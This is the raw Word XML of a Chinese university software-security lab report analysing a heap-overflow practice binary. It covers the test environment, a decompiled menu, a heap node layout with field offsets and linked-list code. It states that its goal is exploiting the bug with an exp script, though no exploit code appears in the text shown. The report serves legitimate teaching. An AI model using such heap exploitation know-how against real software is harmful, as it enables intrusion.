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Style w:val="14"/>
        <w:tblW w:w="8522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35" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr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41" w:type="dxa"/>
            <w:vAlign w:val="center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>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both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>
            <w:pPr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635" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="both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>
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="华文行楷"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>武汉大学国家网络安全学院</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
        <w:t>课程实验(设计)报告</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:sz w:val="84"/>
          <w:szCs w:val="84"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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    目：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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作业4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆操作漏洞分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">              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专业(班)：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信息安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">    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    号：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2021302181156                       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p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    名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  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赵伯俣 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
    </w:p>
    <w:p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软件安全   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赵磊              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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年 1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 xml:space="preserve"> 月 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc336376290"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>目 录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/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_Toc32445 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1实验名称</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32445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_Toc18767 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2实验目的</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc18767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_Toc21347 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3 实验环境</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21347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_Toc24187 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤及内容</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc24187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_Toc19756 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1分析heap-overflow程序内容</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc19756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_Toc27998 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1.1程序运行</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27998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_Toc13163 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1.2主函数</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc13163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_Toc27400 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_804897E</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc27400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_Toc28114 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_804882D</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc28114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_Toc21441 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048ABF</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21441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_Toc21886 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048D09</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21886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_Toc31321 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_8048E99</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc31321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_Toc32637 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.2分析攻击程序代码</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32637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_Toc32547 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/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实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc32547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_Toc21613 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/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实验心得体会</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> PAGEREF _Toc21613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sectPr>
          <w:headerReference r:id="rId5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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc32445"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1实验名称</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/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堆操作漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc18767"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2实验目的</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Heap-overflow程序模拟堆操作，通过分析漏洞，调试exp脚本，并使得能够正确利用。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1347"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3 实验环境</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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VMware Workstation 17 Pro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 16.04.7 LTS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2.7.12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20.3.4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IDA Pro (32位)7.7.220118</w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc24187"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实验步骤及内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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19756"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1分析heap-overflow程序内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc27998"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1.1程序运行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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在ubuntu16.04虚拟机中运行该文件得到的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2783205" cy="2279650"/>
            <wp:effectExtent l="0" t="0" r="1079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该程序是一个管理堆块的程序，能够对堆块进行创建，编辑、显示、显示整个堆块列表和删除等功能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13163"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.1.2主函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7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使用IDA Pro(32位)将该程序的main函数进行反汇编得到的结果如下图</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2865120" cy="2630170"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1143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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2816860" cy="1576070"/>
            <wp:effectExtent l="0" t="0" r="2540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主函数的大体结构为通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sub_804874A()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数获得用户的输入，通过一个switch判断语句根据sub_804874A函数的输出结果来选择执行不同的功能。由此可以得到各个函数的功能为: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sub_804897E(&amp;v0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>创建；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sub_804882D(v0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示堆块列表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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sub_8048ABF(v0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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sub_8048D09(v0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对于堆块进行编辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;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sub_8048E99(&amp;v0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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8" w:name="_Toc27400"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_804897E</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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将该函数反汇编得到的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3759835" cy="4902200"/>
            <wp:effectExtent l="0" t="0" r="12065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该函数的功能为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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使用 malloc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 分配 0x16C（364）字节的内存，并将返回的内存地址存储在指针 v2 中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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t>使用 write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数向标准输出（文件描述符 1）打印提示信息，请求用户输入标题、类型和内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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t>使用 read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数从标准输入（文件描述符 0）读取这些信息。标题最多读取 0x3F（63）字节，类型最多 0x1F（31）字节，内容最多 0xFF（255）字节。这些信息被存储在由 v2 指向的内存块的不同位置。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t>链表操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数似乎在操作一个双向链表。</w:t>
      </w:r>
      <w:r>
        <w:t>v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 指针所指向的内存块是链表的一个新节点。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将 v2 自身的地址存储在它指向的内存的开始位置。用于标识节点自身或用于某种特殊的链表操作。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default"/>
        </w:rPr>
        <w:t>接下来的代码检查 a1 指向的地址中存储的值（可能是链表的头节点指针）。如果它不是空（即链表不为空），则将新节点插入到链表的头部。如果它是空的，则新节点成为链表的第一个节点。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）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>链表插入逻辑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果链表不为空，新节点的 next 指针（v2[2]）指向当前的头节点，而头节点的 prev 指针（*(_DWORD *)(*(_DWORD *)a1 + 4)）指向新节点。然后更新头节点指针为新节点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果链表为空，直接将头节点指针设置为新节点，并将新节点的 prev（v2[1]）和 next（v2[2]）指针设置为 0（空）。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由此可以得出各字段的偏移量关系如下表所示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5"/>
        <w:gridCol w:w="21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起始偏移量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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0x00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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self_pointer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0x04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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flink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0x08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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blink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0x0C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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0x4C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="215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15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0x6C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2154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content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr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28114"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_804882D</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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将该函数的内容进行反汇编得到的结果如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3997325" cy="2515235"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1206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43350" cy="1770380"/>
            <wp:effectExtent l="0" t="0" r="6350" b="762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该函数的功能步骤为：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堆栈保护和缓冲区初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">使用 </w:t>
      </w:r>
      <w:r>
        <w:t>__readgsdword(0x14u)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve"> 进行堆栈保护，这通常用于检测缓冲区溢出或其他安全问题。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使用 memset 初始化一个64字节的字符数组 s，将其全部元素设为 0。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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检查链表是否为空</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>函数首先检查 a1 指针是否非空。如果为空，则表示链表没有元素，函数向标准输出打印一个消息（"\ntotal: 0\n\n"），然后返回。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/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遍历和打印链表元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>如果 a1 非空，函数进入一个循环，遍历链表中的每个元素。v5 用作循环中的当前节点指针。</w:t>
      </w:r>
      <w:r>
